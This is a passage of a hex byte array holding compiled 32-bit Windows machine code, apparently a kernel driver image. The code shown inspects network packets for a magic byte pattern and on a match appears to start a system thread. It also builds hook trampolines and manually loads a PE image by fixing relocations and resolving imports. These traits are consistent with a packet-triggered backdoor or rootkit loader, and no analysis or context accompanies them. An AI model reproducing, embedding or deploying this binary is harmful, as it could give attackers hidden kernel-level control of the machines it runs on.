0x00,0x74,0x59,0x8b,0x4d,\r\n0x0c,0x83,0x39,0x00,0x74,0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45,\r\n0x10,0x8b,0x08,0x51,0x8b,0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xc4,0x51,0xe8,0x1b,\r\n0x0c,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15,\r\n0x90,0x02,0x00,0x10,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b,\r\n0x4d,0xc4,0x03,0x08,0x51,0xe8,0xf4,0x0b,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,\r\n0x8b,0x45,0xc4,0x89,0x02,0xeb,0x27,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,\r\n0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,\r\n0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xeb,0x2b,0x8b,0x55,\r\n0x10,0x8b,0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45,\r\n0x0c,0x8d,0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0xe9,\r\n0xb9,0xfe,0xff,0xff,0xe9,0x4c,0xfd,0xff,0xff,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,\r\n0xe8,0x02,0x00,0x00,0x00,0xeb,0x01,0xc3,0x8b,0x45,0xe0,0x8b,0x4d,0xf0,0x64,0x89,\r\n0x0d,0x00,0x00,0x00,0x00,0x5f,0x5
e,0x5b,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x6a,0x12,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45,\r\n0xfc,0x83,0x7d,0xfc,0x00,0x74,0x44,0x8b,0x45,0xfc,0xc6,0x00,0x58,0x8b,0x4d,0xfc,\r\n0xc6,0x41,0x01,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x89,0x42,0x02,0x8b,0x4d,0xfc,\r\n0xc6,0x41,0x06,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x0c,0x89,0x42,0x07,0x8b,0x4d,0xfc,\r\n0xc6,0x41,0x0b,0x50,0x8b,0x55,0xfc,0xc6,0x42,0x0c,0x68,0x8b,0x45,0xfc,0x8b,0x4d,\r\n0x10,0x89,0x48,0x0d,0x8b,0x55,0xfc,0xc6,0x42,0x11,0xc3,0x8b,0x45,0xfc,0x8b,0xe5,\r\n0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x14,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,\r\n0x74,0x54,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,\r\n0x8d,0x4d,0xf4,0x51,0x8d,0x55,0xf8,0x52,0x8b,0x45,0xfc,0x50,0xe8,0x3f,0xfc,0xff,\r\n0xff,0x85,0xc0,0x75,0x27,0x83,0x3d,0xe0,0x2d,0x00,0x10,0x00,0x74,0x12,0x8b,0x4d,\r\n0xf4,0x51,0x8b,0x55,0xf8,0x52,0x8b,0x45,0x10,0x50,0xff,0x15,0xe0,0x2d,0x00,0x10,\r\n0x6a,0x00,0x8b,0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0xfc,0x8b,\r\n0x02,0x89,0x45,0xfc,0xeb,0xa6,0x8b,0x4d,0x20,0x51,0x8b,0x55,0x1c,0x52,0x8b,0x45,\r\n0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x8b,0xe5,0x5d,\r\n0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,\r\n0x08,0x89,0x4d,0xf8,0x68,0x20,0x21,0x00,0x10,0x6a,0x00,0x8b,0x55,0xf8,0x52,0xe8,\r\n0xdc,0xfe,0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x0e,0x8b,0x45,0x08,\r\n0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xfc,0x89,0x08,0x8b,0x55,0x1c,0x52,0x8b,\r\n0x45,0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x83,0x7d,\r\n0xfc,0x00,0x74,0x1a,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xf8,\r\n0x89,0x08,0x6a,0x00,0x8b,0x55,0xfc,0x52,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0xe5,\r\n0x5d,0xc2,0x18,0x
00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x8b,0x45,0x08,0xc1,0xe8,0x10,0x8b,0x4d,0x08,0x81,0xe1,0xff,0xff,\r\n0x00,0x00,0x03,0xc1,0x89,0x45,0x08,0x8b,0x55,0x08,0xc1,0xea,0x10,0x03,0x55,0x08,\r\n0x89,0x55,0x08,0x8b,0x45,0x08,0xf7,0xd0,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x8b,0x45,0x10,0x89,0x45,0xfc,0x83,0x7d,0x0c,0x01,0x7e,0x20,\r\n0x8b,0x4d,0x08,0x0f,0xb7,0x11,0x03,0x55,0xfc,0x89,0x55,0xfc,0x8b,0x45,0x0c,0x83,\r\n0xe8,0x02,0x89,0x45,0x0c,0x8b,0x4d,0x08,0x83,0xc1,0x02,0x89,0x4d,0x08,0xeb,0xda,\r\n0x83,0x7d,0x0c,0x00,0x7e,0x0c,0x8b,0x55,0x08,0x0f,0xb6,0x02,0x03,0x45,0xfc,0x89,\r\n0x45,0xfc,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x6a,0x00,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x9d,\r\n0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55,0xfc,0x52,0xe8,0x61,0xff,0xff,0xff,0x8b,\r\n0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x8d,0x45,0x08,0x89,0x45,0xfc,0x8b,0x4d,0xfc,0x0f,0xb6,0x51,\r\n0x03,0x81,0xe2,0xff,0x00,0x00,0x00,0x52,0x8b,0x45,0xfc,0x0f,0xb6,0x48,0x02,0x81,\r\n0xe1,0xff,0x00,0x00,0x00,0x51,0x8b,0x55,0xfc,0x0f,0xb6,0x42,0x01,0x25,0xff,0x00,\r\n0x00,0x00,0x50,0x8b,0x4d,0xfc,0x0f,0xb6,0x11,0x81,0xe2,0xff,0x00,0x00,0x00,0x52,\r\n0x68,0xb8,0x08,0x00,0x10,0x68,0xe4,0x2d,0x00,0x10,0xe8,0x5b,0x09,0x00,0x00,0x83,\r\n0xc4,0x18,0xb8,0xe4,0x2d,0x00,0x10,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0x3d,0x10,0x2e,0x00,0x10,0x00,0x74,0x20,0x83,0x3d,0x14,0x2e,\r\n0x00,0x10,0x00,0x76,0x17,0xa1,0x14,0x2e,0x00,0x10,0x50,0x8b,0x0d,0x10,0x2e,0x00,\r\n0x10,0x51,0x68,0xc8,0x08,0x00,0x10,0xe8,0x54,0xf7,0xff,0xff,0x5d,0xc2,0x04,0x00,\r\n0x55,0x8b,0xec,0x83,0xec,0x3c,0x56,0x83,0x7d,0x10,0x22,0x73,0x05,0xe9,0x01,0x02,\r\n0x00,0x00,0x8b,0x45,0x0c,0x89,0x45,0xec,0x8b,0x4d,0xec,0x0f,0xb7,0x51,0x0c,0x83,\r\n0xfa,0x08,0x74,0x05,0xe9,0xea,0x01,0x00,0x00,0x8b,0x45,0xec,0x83,0xc0,0x0e,0x89,\r\n0
x45,0xe8,0x8b,0x4d,0xe8,0x8a,0x11,0xc0,0xea,0x04,0x80,0xe2,0x0f,0x0f,0xb6,0xc2,\r\n0x83,0xf8,0x04,0x75,0x13,0x8b,0x4d,0xe8,0x8a,0x11,0x80,0xe2,0x0f,0x0f,0xb6,0xc2,\r\n0xc1,0xe0,0x02,0x83,0xf8,0x14,0x74,0x05,0xe9,0xb6,0x01,0x00,0x00,0x8b,0x4d,0xe8,\r\n0x0f,0xb6,0x51,0x09,0x83,0xfa,0x01,0x74,0x1c,0x8b,0x45,0xe8,0x0f,0xb6,0x48,0x09,\r\n0x85,0xc9,0x74,0x11,0x8b,0x55,0xe8,0x0f,0xb6,0x42,0x09,0x83,0xf8,0x11,0x74,0x05,\r\n0xe9,0x8e,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x0f,0xb7,0x51,0x02,0x81,0xe2,0xff,0x00,\r\n0x00,0x00,0xc1,0xe2,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0x00,0xff,\r\n0x00,0x00,0xc1,0xf9,0x08,0x8d,0x54,0x0a,0x0e,0x3b,0x55,0x10,0x76,0x05,0xe9,0x60,\r\n0x01,0x00,0x00,0x8b,0x45,0xe8,0x66,0x8b,0x48,0x0a,0x66,0x89,0x4d,0xd0,0x33,0xd2,\r\n0x8b,0x45,0xe8,0x66,0x89,0x50,0x0a,0x0f,0xb7,0x75,0xd0,0x6a,0x14,0x8b,0x4d,0xe8,\r\n0x51,0xe8,0x6a,0xfe,0xff,0xff,0x0f,0xb7,0xd0,0x3b,0xf2,0x74,0x05,0xe9,0x31,0x01,\r\n0x00,0x00,0x8b,0x45,0xe8,0x8b,0x48,0x10,0x51,0xe8,0x82,0xfe,0xff,0xff,0x50,0x8d,\r\n0x55,0xd8,0x52,0xe8,0x34,0x08,0x00,0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x8b,0x48,\r\n0x0c,0x51,0xe8,0x69,0xfe,0xff,0xff,0x50,0x8d,0x55,0xf0,0x52,0xe8,0x1b,0x08,0x00,\r\n0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0xff,0x00,0x00,\r\n0x00,0xc1,0xe1,0x08,0x8b,0x55,0xe8,0x0f,0xb7,0x42,0x02,0x25,0x00,0xff,0x00,0x00,\r\n0xc1,0xf8,0x08,0x03,0xc8,0x51,0x8b,0x4d,0xe8,0x0f,0xb6,0x51,0x09,0x52,0x8d,0x45,\r\n0xd8,0x50,0x8d,0x4d,0xf0,0x51,0x68,0xe8,0x08,0x00,0x10,0xe8,0x22,0x07,0x00,0x00,\r\n0x83,0xc4,0x14,0xc7,0x45,0xd4,0x34,0x09,0x00,0x10,0xc7,0x45,0xcc,0x00,0x00,0x00,\r\n0x00,0xeb,0x09,0x8b,0x55,0xcc,0x83,0xc2,0x01,0x89,0x55,0xcc,0x8b,0x45,0xd4,0x50,\r\n0xe8,0xb1,0x07,0x00,0x00,0x83,0xc4,0x04,0x8b,0x4d,0x10,0x2b,0xc8,0x39,0x4d,0xcc,\r\n0x0f,0x83,0x8d,0x00,0x00,0x00,0x8b,0x55,0xd4,0x52,0xe8,0x97,0x07,0x00,0x00,0x83,\r\n0xc4,0x04,0x50,0x8b,0x45,0xd4,0x50,0x8b,0x4d,0x0c,0x03,0x4d,0xcc,0x51,0xff,0x15,\r\n0xe8,0x02,0x00,0x10,0x8b,0xf0,0x8b,0x55,0xd4,0x52,0xe8,0x77,0x07,0x00
,0x00,0x83,\r\n0xc4,0x04,0x3b,0xf0,0x75,0x58,0x68,0x48,0x09,0x00,0x10,0xe8,0xb2,0x06,0x00,0x00,\r\n0x83,0xc4,0x04,0xc7,0x45,0xc4,0x00,0x00,0x00,0x00,0x6a,0x00,0x68,0x40,0x23,0x00,\r\n0x10,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x45,0xc4,0x50,\r\n0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xc8,0x83,0x7d,0xc8,0x00,0x7c,0x0c,0x8b,\r\n0x4d,0xc4,0x51,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xc8,0x52,0x68,\r\n0x94,0x09,0x00,0x10,0xe8,0x69,0x06,0x00,0x00,0x83,0xc4,0x08,0xeb,0x05,0xe9,0x50,\r\n0xff,0xff,0xff,0x5e,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x33,0xc0,0x89,\r\n0x45,0xfc,0xc7,0x45,0xf8,0x80,0x3c,0x36,0xfe,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,\r\n0x8b,0x4d,0x08,0x51,0x68,0xbc,0x09,0x00,0x10,0xe8,0x24,0x06,0x00,0x00,0x83,0xc4,\r\n0x08,0x68,0x70,0x23,0x00,0x10,0xe8,0x35,0xf7,0xff,0xff,0xe8,0xf0,0xf5,0xff,0xff,\r\n0x8d,0x55,0xf8,0x52,0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0x83,0x7d,\r\n0x08,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0x08,0x50,0xff,0x15,0x90,0x02,0x00,0x10,\r\n0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0x3d,0x1c,0x2e,0x00,0x10,0x00,0x75,0x05,0x8b,0x45,0x08,0xeb,\r\n0x0c,0x8b,0x45,0x08,0x2b,0x05,0x1c,0x2e,0x00,0x10,0x03,0x45,0x0c,0x5d,0xc2,0x08,\r\n0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x2d,\r\n0x12,0x00,0x00,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9,\r\n0x54,0x01,0x00,0x00,0xa1,0x1c,0x2e,0x00,0x10,0x50,0x68,0xc0,0x0b,0x00,0x10,0xe8,\r\n0x7e,0x05,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0xe8,0x92,0xf6,0xff,0xff,0x83,0x3d,\r\n0x1c,0x2e,0x00,0x10,0x00,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9,0x27,0x01,0x00,\r\n0x00,0x8b,0x0d,0x1c,0x2e,0x00,0x10,0x8b,0x15,0x1c,0x2e,0x00,0x10,0x03,0x51,0x3c,\r\n0x89,0x55,0xf8,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8
b,0x55,0xf8,0x8d,0x44,0x0a,\r\n0x18,0x89,0x45,0xf4,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xf0,\r\n0x83,0xc1,0x01,0x89,0x4d,0xf0,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xf0,\r\n0x0f,0x83,0x89,0x00,0x00,0x00,0x83,0x3d,0x00,0x2e,0x00,0x10,0x00,0x75,0x0c,0x8b,\r\n0x4d,0xf4,0x8b,0x51,0x0c,0x89,0x15,0x00,0x2e,0x00,0x10,0x8b,0x45,0xf4,0x8b,0x48,\r\n0x24,0x81,0xe1,0x00,0x00,0x00,0x02,0x74,0x13,0x8b,0x55,0xf4,0x8b,0x42,0x24,0x25,\r\n0xff,0xff,0xff,0xfd,0x8b,0x4d,0xf4,0x89,0x41,0x24,0xeb,0x45,0x8b,0x55,0xf8,0x8b,\r\n0x42,0x38,0x83,0xe8,0x01,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xf8,\r\n0x8b,0x42,0x38,0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x8b,0x55,\r\n0xf8,0x03,0x42,0x38,0x89,0x45,0xec,0xeb,0x09,0x8b,0x45,0xf4,0x8b,0x48,0x08,0x89,\r\n0x4d,0xec,0x8b,0x15,0x04,0x2e,0x00,0x10,0x03,0x55,0xec,0x89,0x15,0x04,0x2e,0x00,\r\n0x10,0x8b,0x45,0xf4,0x83,0xc0,0x28,0x89,0x45,0xf4,0xe9,0x5e,0xff,0xff,0xff,0x8b,\r\n0x0d,0x00,0x2e,0x00,0x10,0x51,0x8b,0x15,0x04,0x2e,0x00,0x10,0x52,0x68,0xe4,0x0b,\r\n0x00,0x10,0xe8,0x7b,0x04,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xf8,0x8b,0x0d,0x1c,\r\n0x2e,0x00,0x10,0x89,0x48,0x34,0x8b,0x55,0xf8,0x8b,0x42,0x50,0xa3,0xfc,0x2d,0x00,\r\n0x10,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x08,0x03,0x00,0x10,0x89,0x45,0xfc,0x83,\r\n0x7d,0xfc,0x00,0x7d,0x11,0x8b,0x4d,0xfc,0x51,0x68,0x0c,0x0c,0x00,0x10,0xe8,0x3f,\r\n0x04,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,\r\n0x48,0x3c,0x89,0x4d,0xf8,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x55,0xf8,0x0f,\r\n0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x1d,0x8b,0x4d,0xf8,0x83,0xb9,0x80,\r\n0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82,0x80,0x00,\r\n0x00,0x00,0x89,0x45,0xfc,0xeb,0x3f,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa,\r\n0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,\r\n0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x
90,0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x45,\r\n0xf4,0x8b,0x4d,0x08,0x03,0x88,0x90,0x00,0x00,0x00,0x89,0x4d,0xfc,0xeb,0x07,0x32,\r\n0xc0,0xe9,0xd7,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xcb,0x00,0x00,0x00,\r\n0x8b,0x55,0xfc,0x83,0x7a,0x0c,0x00,0x0f,0x84,0xbe,0x00,0x00,0x00,0x8b,0x45,0xfc,\r\n0x8b,0x4d,0x08,0x03,0x48,0x0c,0x51,0x8d,0x95,0xf0,0xfe,0xff,0xff,0x52,0xe8,0xdd,\r\n0x0a,0x00,0x00,0x8b,0x45,0x0c,0x50,0x8d,0x8d,0xf0,0xfe,0xff,0xff,0x51,0xe8,0x1d,\r\n0x0b,0x00,0x00,0x50,0xe8,0x57,0x0a,0x00,0x00,0x85,0xc0,0x74,0x04,0xeb,0x7e,0xeb,\r\n0x7c,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,\r\n0x8b,0x8d,0xec,0xfe,0xff,0xff,0x83,0x39,0x00,0x74,0x62,0x8b,0x95,0xec,0xfe,0xff,\r\n0xff,0x8b,0x45,0x08,0x03,0x02,0x89,0x85,0xe0,0xfe,0xff,0xff,0x8b,0x8d,0xe0,0xfe,\r\n0xff,0xff,0x83,0xc1,0x02,0x89,0x8d,0xe4,0xfe,0xff,0xff,0x8b,0x95,0xe4,0xfe,0xff,\r\n0xff,0x52,0x8b,0x45,0x10,0x50,0xe8,0x35,0x0c,0x00,0x00,0x89,0x85,0xe8,0xfe,0xff,\r\n0xff,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x04,0x32,0xc0,0xeb,0x2f,0x8b,0x8d,\r\n0xec,0xfe,0xff,0xff,0x8b,0x95,0xe8,0xfe,0xff,0xff,0x89,0x11,0x8b,0x85,0xec,0xfe,\r\n0xff,0xff,0x83,0xc0,0x04,0x89,0x85,0xec,0xfe,0xff,0xff,0xeb,0x93,0x8b,0x4d,0xfc,\r\n0x83,0xc1,0x14,0x89,0x4d,0xfc,0xe9,0x35,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,\r\n0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,\r\n0x4d,0xf8,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,\r\n0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x8b,0x55,\r\n0xf8,0x0f,0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x37,0x8b,0x4d,0xf8,0x83,\r\n0xb9,0xa0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82,\r\n0xa0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xf8,0x8b,0x91,0xa4,0x00,0x00,0x00,\r\n0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x34,0x33,0xd2,0x89,0x4d,0xe8,0x89,0x55,\r\n0xec,0xeb,0x5a,0x8b,0
x45,0xf8,0x0f,0xb7,0x48,0x04,0x81,0xf9,0x64,0x86,0x00,0x00,\r\n0x75,0x44,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42,0x3c,0x89,0x45,0xe4,0x8b,0x4d,\r\n0xe4,0x83,0xb9,0xb0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xe4,0x8b,0x45,0x08,\r\n0x03,0x82,0xb0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xe4,0x8b,0x91,0xb4,0x00,\r\n0x00,0x00,0x89,0x55,0xfc,0x8b,0x45,0xe4,0x8b,0x48,0x30,0x89,0x4d,0xe8,0x8b,0x50,\r\n0x34,0x89,0x55,0xec,0xeb,0x07,0x32,0xc0,0xe9,0xff,0x00,0x00,0x00,0x83,0x7d,0xf4,\r\n0x00,0x0f,0x84,0xf3,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8b,0x45,\r\n0xfc,0x3b,0x45,0xe0,0x0f,0x86,0xe0,0x00,0x00,0x00,0x8b,0x4d,0xf4,0x83,0x79,0x04,\r\n0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x55,0xf4,0x8b,0x42,0x04,0x83,0xe8,0x08,\r\n0xd1,0xe8,0x89,0x45,0xd8,0x8b,0x4d,0xf4,0x83,0xc1,0x08,0x89,0x4d,0xdc,0xc7,0x45,\r\n0xd4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xd4,0x83,0xc2,0x01,0x89,0x55,0xd4,\r\n0x8b,0x45,0xd4,0x3b,0x45,0xd8,0x0f,0x83,0x81,0x00,0x00,0x00,0x8b,0x4d,0xd4,0x8b,\r\n0x55,0xdc,0x0f,0xb7,0x04,0x4a,0x85,0xc0,0x7e,0x6e,0x8b,0x4d,0xd4,0x8b,0x55,0xdc,\r\n0x0f,0xb7,0x04,0x4a,0x25,0x00,0xf0,0x00,0x00,0xc1,0xf8,0x0c,0x66,0x89,0x45,0xd0,\r\n0x0f,0xb7,0x4d,0xd0,0x83,0xf9,0x03,0x74,0x0d,0x0f,0xb7,0x55,0xd0,0x83,0xfa,0x0a,\r\n0x74,0x04,0x32,0xc0,0xeb,0x66,0x8b,0x45,0xd4,0x8b,0x4d,0xdc,0x0f,0xb7,0x14,0x41,\r\n0x81,0xe2,0xff,0x0f,0x00,0x00,0x8b,0x45,0xf4,0x8b,0x08,0x03,0xca,0x8b,0x45,0x0c,\r\n0x99,0x2b,0x45,0xe8,0x1b,0x55,0xec,0x8b,0x55,0x08,0x03,0x04,0x0a,0x8b,0x4d,0xd4,\r\n0x8b,0x55,0xdc,0x0f,0xb7,0x0c,0x4a,0x81,0xe1,0xff,0x0f,0x00,0x00,0x8b,0x55,0xf4,\r\n0x03,0x0a,0x8b,0x55,0x08,0x89,0x04,0x0a,0xe9,0x6a,0xff,0xff,0xff,0x8b,0x45,0xf4,\r\n0x8b,0x4d,0xf4,0x03,0x48,0x04,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x8b,0x45,0xe0,0x03,\r\n0x42,0x04,0x89,0x45,0xe0,0xe9,0x14,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,\r\n0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x10,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf8,\r\n0x00,
0x01,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xb8,0x01,0x00,0x00,0x00,\r\n0x85,0xc0,0x0f,0x84,0x84,0x00,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15,\r\n0xe0,0x02,0x00,0x10,0x89,0x45,0xf4,0x83,0x7d,0xf4,0x00,0x75,0x14,0x68,0x3c,0x0c,\r\n0x00,0x10,0xe8,0x9b,0x00,0x00,0x00,0x83,0xc4,0x04,0x33,0xc0,0xe9,0x8b,0x00,0x00,\r\n0x00,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0x8d,0x55,0xf0,0x52,0x8b,0x45,0xf8,0x50,\r\n0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c,0x03,0x00,0x10,0x89,0x45,\r\n0xfc,0x81,0x7d,0xfc,0x04,0x00,0x00,0xc0,0x75,0x2b,0x6a,0x00,0x8b,0x45,0xf4,0x50,\r\n0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0x83,0x7d,0xf0,\r\n0x00,0x76,0x0e,0x8b,0x4d,0xf0,0x81,0xc1,0x00,0x01,0x00,0x00,0x89,0x4d,0xf8,0xeb,\r\n0x02,0xeb,0x09,0xeb,0x02,0xeb,0x05,0xe9,0x6f,0xff,0xff,0xff,0x83,0x7d,0xfc,0x00,\r\n0x7d,0x27,0x8b,0x55,0xfc,0x52,0x68,0x54,0x0c,0x00,0x10,0xe8,0x22,0x00,0x00,0x00,\r\n0x83,0xc4,0x08,0x83,0x7d,0xf4,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0xf4,0x50,0xff,\r\n0x15,0x90,0x02,0x00,0x10,0x33,0xc0,0xeb,0x03,0x8b,0x45,0xf4,0x8b,0xe5,0x5d,0xc2,\r\n0x04,0x00,0xff,0x25,0x28,0x03,0x00,0x10,0xff,0x25,0x20,0x03,0x00,0x10,0xff,0x25,\r\n0x1c,0x03,0x00,0x10,0xff,0x25,0xd4,0x02,0x00,0x10,0xff,0x25,0x90,0x02,0x00,0x10,\r\n0xff,0x25,0x94,0x02,0x00,0x10,0xff,0x25,0x98,0x02,0x00,0x10,0xff,0x25,0x9c,0x02,\r\n0x00,0x10,0xff,0x25,0xa0,0x02,0x00,0x10,0xff,0x25,0xa4,0x02,0x00,0x10,0xff,0x25,\r\n0xa8,0x02,0x00,0x10,0xff,0x25,0xac,0x02,0x00,0x10,0xff,0x25,0xb0,0x02,0x00,0x10,\r\n0xff,0x25,0xb4,0x02,0x00,0x10,0xff,0x25,0xb8,0x02,0x00,0x10,0xff,0x25,0xbc,0x02,\r\n0x00,0x10,0xff,0x25,0xc0,0x02,0x00,0x10,0xff,0x25,0xc4,0x02,0x00,0x10,0xff,0x25,\r\n0xc8,0x02,0x00,0x10,0xff,0x25,0xcc,0x02,0x00,0x10,0xff,